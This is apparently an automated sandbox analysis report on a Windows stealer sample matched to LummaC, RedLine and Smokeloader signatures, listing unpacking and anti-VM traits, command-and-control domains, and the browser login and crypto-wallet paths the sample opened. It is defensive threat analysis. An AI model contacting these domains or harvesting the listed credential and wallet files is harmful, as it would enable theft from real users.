Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00843B97	0_2_00843B97
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00821BB6	0_2_00821BB6
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00813B67	0_2_00813B67
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00852CC7	0_2_00852CC7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0081CCC9	0_2_0081CCC9
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0083ECC9	0_2_0083ECC9
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0081EC17	0_2_0081EC17
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00812D87	0_2_00812D87
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00842D8B	0_2_00842D8B
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0084CDA7	0_2_0084CDA7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0083EDC6	0_2_0083EDC6
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00847DD0	0_2_00847DD0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00815D17	0_2_00815D17
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0082DD37	0_2_0082DD37
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00824E87	0_2_00824E87
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0083BE07	0_2_0083BE07
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0083EE08	0_2_0083EE08
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0083EE1A	0_2_0083EE1A
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0083DE57	0_2_0083DE57
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00852F87	0_2_00852F87
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00830FF7	0_2_00830FF7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00827FFA	0_2_00827FFA
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0084AF17	0_2_0084AF17
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0082DF17	0_2_0082DF17
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0083FF23	0_2_0083FF23
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00844F56	0_2_00844F56
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00845F7A	0_2_00845F7A

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: String function: 00414C10 appears 116 times
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: String function: 008183D7 appears 77 times
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: String function: 00408170 appears 45 times
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: String function: 00824E77 appears 116 times

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 1828

Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesOrehinal4 vs Q7QR4k52HL.exe
Source: Q7QR4k52HL.exe, 00000000.00000002.1929908575.00000000004DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesOrehinal4 vs Q7QR4k52HL.exe
Source: Q7QR4k52HL.exe, 00000000.00000000.1691770249.000000000044D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOrehinal4 vs Q7QR4k52HL.exe
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.00000000004F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesOrehinal4 vs Q7QR4k52HL.exe
Source: Q7QR4k52HL.exe	Binary or memory string: OriginalFilenamesOrehinal4 vs Q7QR4k52HL.exe

Source: Q7QR4k52HL.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: Q7QR4k52HL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@11/2

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Code function: 0_2_005807A6 CreateToolhelp32Snapshot,Module32First,

0_2_005807A6

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Code function: 0_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_0043B870

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6112

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\aef640e2-39b4-407a-93dd-5ffd46f5aa41

Jump to behavior

Source: Q7QR4k52HL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Q7QR4k52HL.exe, 00000000.00000003.1757114291.0000000002E21000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Q7QR4k52HL.exe	Virustotal: Detection: 59%
Source: Q7QR4k52HL.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

File read: C:\Users\user\Desktop\Q7QR4k52HL.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Q7QR4k52HL.exe "C:\Users\user\Desktop\Q7QR4k52HL.exe"
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 1828

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Unpacked PE file: 0.2.Q7QR4k52HL.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Unpacked PE file: 0.2.Q7QR4k52HL.exe.400000.0.unpack

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh	0_2_00441853
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00583156 push ebx; ret	0_2_00583157
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0058512A pushad ; ret	0_2_0058512B
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00585195 pushfd ; ret	0_2_00585196
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00583CFE push esi; retn 001Ch	0_2_00583D02
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0083B05A push ebp; iretd	0_2_0083B05D
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00851AB7 push eax; mov dword ptr [esp], 0E0908DBh	0_2_00851ABA

Source: Q7QR4k52HL.exe

Static PE information: section name: .text entropy: 7.809678678911755

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe TID: 2124

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Q7QR4k52HL.exe, 00000000.00000002.1929908575.00000000004A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp1P%SystemRoot%\system32\mswsock.dllj
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000002.1929908575.0000000000502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

API call chain: ExitProcess graph end node

graph_0-26264

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Code function: 0_2_004402C0 LdrInitializeThunk,

0_2_004402C0

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00580083 push dword ptr fs:[00000030h]	0_2_00580083
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0081092B mov eax, dword ptr fs:[00000030h]	0_2_0081092B
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00810D90 mov eax, dword ptr fs:[00000030h]	0_2_00810D90

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Q7QR4k52HL.exe	String found in binary or memory: robinsharez.shop
Source: Q7QR4k52HL.exe	String found in binary or memory: handscreamny.shop
Source: Q7QR4k52HL.exe	String found in binary or memory: chipdonkeruz.shop
Source: Q7QR4k52HL.exe	String found in binary or memory: versersleep.shop
Source: Q7QR4k52HL.exe	String found in binary or memory: crowdwarek.shop
Source: Q7QR4k52HL.exe	String found in binary or memory: apporholis.shop
Source: Q7QR4k52HL.exe	String found in binary or memory: femalsabler.shop
Source: Q7QR4k52HL.exe	String found in binary or memory: soundtappysk.shop
Source: Q7QR4k52HL.exe	String found in binary or memory: skidjazzyric.click

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Q7QR4k52HL.exe PID: 6112, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
